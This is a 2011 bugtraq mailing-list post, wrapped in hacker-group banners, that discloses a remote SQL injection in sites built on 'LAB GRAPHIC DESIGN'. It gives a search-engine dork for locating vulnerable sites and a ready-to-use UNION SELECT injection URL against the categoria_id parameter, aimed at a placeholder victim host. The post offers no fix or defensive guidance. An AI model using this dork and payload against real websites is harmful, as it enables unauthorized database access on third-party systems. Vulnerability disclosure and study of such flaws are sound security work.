
Date: Tue, 23 Aug 2011 15:05:21 GMT
From: ehsan_hp200@...mail.com
To: bugtraq@...urityfocus.com
Subject: LAB GRAPHIC DESIGN (index.php?categoria_id) Remote SQL injection
 Vulnerability

################################  IRANIAN THE BEST HACKERS IN THE WORLD ##################
#################### ####################
##
## Remote SQL injection Vulnerability
##
## LAB GRAPHIC DESIGN (index.php?categoria_id)
##                           
###############################################################
###############################################################
###############################################################
###############################################################
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : Ehsan_Hp200@...mail.com
##  
## Persian Gulf 4 Ever!
#############################
#############################
#############################
#############################
#############################
##
##

Dork : "Powered by LAB GRAPHIC DESIGN "

Exploite:

www.victim.com/index.php?categoria_id=Null Union Select @@version

#########################################################################################
SpeCial TanX To : Skote_Vahshat
##########################################################################################
###############################  IRANIAN THE BEST HACKERS IN THE WORLD ################## 		  
